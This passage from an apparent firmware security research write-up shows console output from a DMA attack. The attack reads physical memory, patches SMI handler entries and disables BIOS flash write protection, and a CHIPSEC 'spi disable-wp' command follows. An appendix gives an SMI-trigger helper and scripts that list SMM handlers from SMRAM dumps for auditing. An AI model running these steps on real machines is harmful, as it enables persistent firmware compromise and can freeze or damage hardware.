[+] Reading physical memory 0xd73de000 - 0xd73fbfff
[+] Reading physical memory 0xd73fc000 - 0xd7419fff
[+] Reading physical memory 0xd741a000 - 0xd7437fff
[+] Reading physical memory 0xd7438000 - 0xd7455fff
[+] Reading physical memory 0xd7456000 - 0xd7473fff
[+] Reading physical memory 0xd7474000 - 0xd7491fff
[+] Reading physical memory 0xd7492000 - 0xd74affff
[+] Reading physical memory 0xd74b0000 - 0xd74cdfff
[+] Reading physical memory 0xd74ce000 - 0xd74ebfff
[+] Reading physical memory 0xd74ec000 - 0xd7509fff
[+] Reading physical memory 0xd750a000 - 0xd7527fff
[+] Reading physical memory 0xd7528000 - 0xd7545fff
[+] Reading physical memory 0xd7546000 - 0xd7563fff
[+] Reading physical memory 0xd7564000 - 0xd7581fff
[+] Reading physical memory 0xd7582000 - 0xd759ffff
[+] Reading physical memory 0xd75a0000 - 0xd75bdfff
[+] Reading physical memory 0xd75be000 - 0xd75dbfff
[+] Reading physical memory 0xd75dc000 - 0xd75f9fff
[+] Reading physical memory 0xd75fa000 - 0xd7617fff
[+] Reading physical memory 0xd7618000 - 0xd7635fff
[+] Reading physical memory 0xd7636000 - 0xd7653fff
[+] Reading physical memory 0xd7654000 - 0xd7671fff
[+] Reading physical memory 0xd7672000 - 0xd768ffff
[+] Reading physical memory 0xd7690000 - 0xd76adfff
[+] Reading physical memory 0xd76ae000 - 0xd76cbfff
[+] Reading physical memory 0xd76cc000 - 0xd76e9fff
[+] Reading physical memory 0xd76ea000 - 0xd7707fff
[+] Reading physical memory 0xd7708000 - 0xd7725fff
[+] Reading physical memory 0xd7726000 - 0xd7743fff
[+] Reading physical memory 0xd7744000 - 0xd7761fff
[+] Reading physical memory 0xd7762000 - 0xd777ffff
[+] Reading physical memory 0xd7780000 - 0xd779dfff
[+] Reading physical memory 0xd779e000 - 0xd77bbfff
[+] Reading physical memory 0xd77bc000 - 0xd77d9fff
[+] Reading physical memory 0xd77da000 - 0xd77f7fff
[+] Reading physical memory 0xd77f8000 - 0xd77fffff
[+] DONE
[+] Patching SMI entries...
SMI entry found at 0x3f6000
SMI entry found at 0x3f6800
SMI entry found at 0x3f7000
SMI entry found at 0x3f7800
SMI entry found at 0x3f8000
[+] Memory allocated at 0x7f614a470000
[+] Physical address is 0x3ef092000
Pass 1: parsed user script and 109 library script(s) using 62176virt/36352res/4192shr/32976data kb, in 160usr/10sys/172real ms.
Pass 2: analyzed script: 1 probe(s), 14 function(s), 4 embed(s), 2 global(s) using 108880virt/84616res/5708shr/79680data kb, in 790usr/200sys/995real ms.
Pass 3: translated to C into "/tmp/stapEg28Q9/stap_b74b06d8681a8605cef014148ae17b5b_7943_src.c" using 108880virt/84744res/5836shr/79680data kb, in 180usr/60sys/237real ms.
Pass 4: compiled C into "stap_b74b06d8681a8605cef014148ae17b5b_7943.ko" in 3530usr/280sys/5236real ms.
Pass 5: starting run.
[+] SystemTap script started
[+] Writing physical memory 0xd73f6000 - 0xd73f6fff
[+] DONE
[+] Memory allocated at 0x7f614ee2b000
[+] Physical address is 0x3f3bcf000
Pass 1: parsed user script and 109 library script(s) using 62176virt/36284res/4124shr/32976data kb, in 160usr/10sys/173real ms.
Pass 2: analyzed script: 1 probe(s), 14 function(s), 4 embed(s), 2 global(s) using 108880virt/84532res/5628shr/79680data kb, in 790usr/200sys/995real ms.
Pass 3: translated to C into "/tmp/stapaurR1A/stap_f296db5c81c5158e1ac0e155bbaaf3b6_7943_src.c" using 108880virt/84660res/5756shr/79680data kb, in 180usr/60sys/233real ms.
Pass 4: compiled C into "stap_f296db5c81c5158e1ac0e155bbaaf3b6_7943.ko" in 3530usr/260sys/6606real ms.
Pass 5: starting run.
[+] SystemTap script started
[+] Writing physical memory 0xd73f7000 - 0xd73f7fff
[+] DONE
[+] Memory allocated at 0x7f614a470000
[+] Physical address is 0x3ef096000
Pass 1: parsed user script and 109 library script(s) using 62176virt/36396res/4236shr/32976data kb, in 160usr/10sys/172real ms.
Pass 2: analyzed script: 1 probe(s), 14 function(s), 4 embed(s), 2 global(s) using 108880virt/84656res/5752shr/79680data kb, in 790usr/200sys/997real ms.
Pass 3: translated to C into "/tmp/stapXeWg7I/stap_5ab1311d1369a5f00c3287bf44fa61aa_7943_src.c" using 108880virt/84784res/5880shr/79680data kb, in 190usr/50sys/236real ms.
Pass 4: compiled C into "stap_5ab1311d1369a5f00c3287bf44fa61aa_7943.ko" in 3530usr/270sys/4677real ms.
Pass 5: starting run.
[+] SystemTap script started
[+] Writing physical memory 0xd73f8000 - 0xd73f8fff
[+] DONE
[+] DONE, 4 SMI handlers patched
[+] BIOS_CNTL is 0x2a
[+] BIOSWE bit was set, BIOS write protection is disabled now

Verify that BIOS write protection is disabled now:
localhost chipsec # python chipsec_util.py spi disable-wp

[CHIPSEC] Executing command 'spi' with args ['disable-wp']

[CHIPSEC] Trying to disable BIOS write protection..
[+] BIOS region write protection is disabled in SPI flash
[CHIPSEC] (spi disable-wp) time elapsed 0.000

Please note that before running the DMA attack code you also need to run the boot_script_table CHIPSEC module to exploit the UEFI boot script table vulnerability and disable TSEGMB protection. Otherwise, running patch_smi_entry.py or dma_expl.py against properly locked SMRAM can lead to unexpected behaviour (for example, a system freeze) during the read or write attempt.

To play with this attack on my test hardware in a more convenient way, I installed Gentoo Linux with a properly configured kernel on a USB flash drive and copied the CHIPSEC code there along with all of the necessary stuff.

Running dma_expl.py on MacBook Pro

My Apple MacBook Pro 10,2 (which also has the UEFI boot script table vulnerability) is immune to the SMI entry patch because, instead of BIOS_CNTL, it implements flash write protection using SPI Protected Range registers, which don't rely on SMM at all. However, dma_expl.py supports this Apple hardware, and I was able to dump its SMRAM contents, which might be useful for other research purposes such as a security audit of the SMM code.

Appendix


Some time ago there were two similar works about SMM code vulnerabilities: "A New Class of Vulnerabilities in SMI Handlers" by Intel Security and "How Many Million BIOSes Would you Like to Infect?" by LegbaCore. The authors of these works discovered a lot of vulnerabilities in software SMI handlers that were registered by firmware code using EFI_SMM_SW_DISPATCH2_PROTOCOL. Such handlers can be triggered by the operating system by writing a handler number to the APMC I/O port B2h.
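
As a minimal illustration of the trigger itself, here is a Python 3 sketch of a helper that writes one byte at offset B2h of a seekable file object. The helper name trigger_sw_smi is made up, and the example below only does a dry run against an in-memory buffer. Using it on real hardware is an assumption on my side: it would mean passing an unbuffered handle to the Linux /dev/port device, opened as root, and it can easily hang the machine.

```python
import io

APMC_PORT = 0xB2  # I/O port used to raise software SMIs


def trigger_sw_smi(value, port_file):
    """Write a SW SMI number to offset B2h of `port_file`.

    `port_file` is any seekable binary file object. For real I/O port
    access on Linux this is assumed to be /dev/port opened unbuffered,
    which is not exercised by this sketch.
    """
    if not 0 <= value <= 0xFF:
        raise ValueError('SW SMI number must fit into one byte')
    port_file.seek(APMC_PORT)
    port_file.write(bytes([value]))


# Dry run: an in-memory buffer stands in for the I/O port space.
fake_ports = io.BytesIO(bytes(0x100))
trigger_sw_smi(0xCC, fake_ports)
print(hex(fake_ports.getvalue()[APMC_PORT]))
```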

To audit the SMM code of my machines for this class of vulnerabilities I also made two Python scripts that read dumped SMRAM contents and find all of the registered SW SMI handlers with their numbers. You might find them useful too.

For Intel DQ77KB:
'''
Extract SW SMI handlers information from SMRAM dump.
Example:

$ python smi_handlers.py TSEG.bin
0xcc: 0xd70259d8
0xb8: 0xd706673c
0xba: 0xd706e970
0x05: 0xd706b474
0x04: 0xd706b45c
0x03: 0xd706b2e0
0x01: 0xd706b2dc
0xa1: 0xd70664c4
0xa0: 0xd706636c
0x40: 0xd70254f8

'''
import sys, os, struct

def main():

    path = sys.argv[1]
    data = open(path, 'rb').read()

    for i in range(len(data)):

        # get range from string
        data_at = lambda offs, size: data[i + offs : i + offs + size]

        #
        # 00: "SMIH"
        # 04: handler address (qword)
        # 0c: SW SMI value (byte)
        #
        if data_at(0, 4) == 'SMIH':

            addr, val = struct.unpack('QB', data_at(4, 8 + 1))

            if val != 0 and addr < 0xffffffff:

                print '0x%.2x: 0x%.8x' % (val, addr)


if __name__ == '__main__':

    sys.exit(main())

For Apple MacBookPro 10,2:
'''
Extract SW SMI handlers information from SMRAM dump.
Example:

$ python smi_handlers.py TSEG.bin
0x25: 0x893aaca0
0x48: 0x893a3170
0x01: 0x893a831c
0x05: 0x893a7fa0
0x03: 0x893a7e46
0xf1: 0x893a7dd5
0xf0: 0x893a7b76

'''
import sys, os, struct

def main():

    path = sys.argv[1]
    data = open(path, 'rb').read()    

    for i in range(len(data)):

        # get range from string
        data_at = lambda offs, size: data[i + offs : i + offs + size]

        #
        # 00: "DBRC"
        # 68: handler address (qword)
        # 70: SW SMI value (byte)
        #
        if data_at(0, 4) == 'DBRC':

            addr = struct.unpack('Q', data_at(0x68, 8))[0]
            val = struct.unpack('B', data_at(0x70, 1))[0]

            if val != 0 and addr < 0xffffffff:

                print '0x%.2x: 0x%.8x' % (val, addr)

if __name__ == '__main__':

    sys.exit(main())
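
Both scripts differ only in the record magic and in two field offsets, so the scan can be sketched as a single parametrized Python 3 function. This is an illustrative rewrite, not the code from my repository: the name find_sw_smi_handlers is made up, the layouts are the ones described in the comments of the two listings above, and little-endian fields are assumed.

```python
import struct


def find_sw_smi_handlers(data, magic, addr_offs, val_offs):
    """Return (SW SMI value, handler address) pairs found in an SMRAM dump.

    `addr_offs` and `val_offs` are relative to the start of the magic;
    little-endian fields are assumed.
    """
    found = []
    pos = data.find(magic)
    while pos != -1:
        # Skip records that are truncated by the end of the dump.
        if pos + max(addr_offs + 8, val_offs + 1) <= len(data):
            addr, = struct.unpack_from('<Q', data, pos + addr_offs)
            val = data[pos + val_offs]
            if val != 0 and addr < 0xFFFFFFFF:
                found.append((val, addr))
        pos = data.find(magic, pos + 1)
    return found


# Synthetic record in the "SMIH" layout, for demonstration only.
record = b'SMIH' + struct.pack('<QB', 0xD70259D8, 0xCC)
for val, addr in find_sw_smi_handlers(bytes(16) + record, b'SMIH', 4, 0x0C):
    print('0x%.2x: 0x%.8x' % (val, addr))
```

For the Intel DQ77KB layout the call is find_sw_smi_handlers(data, b'SMIH', 4, 0x0c), for the MacBook Pro layout it is find_sw_smi_handlers(data, b'DBRC', 0x68, 0x70). Searching with bytes.find() instead of checking every offset in a Python loop also makes the scan of an 8 MB dump considerably faster.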

I updated the GitHub repository of my UEFI boot script table exploit with the DMA attack and SMI entry patch code, have fun :)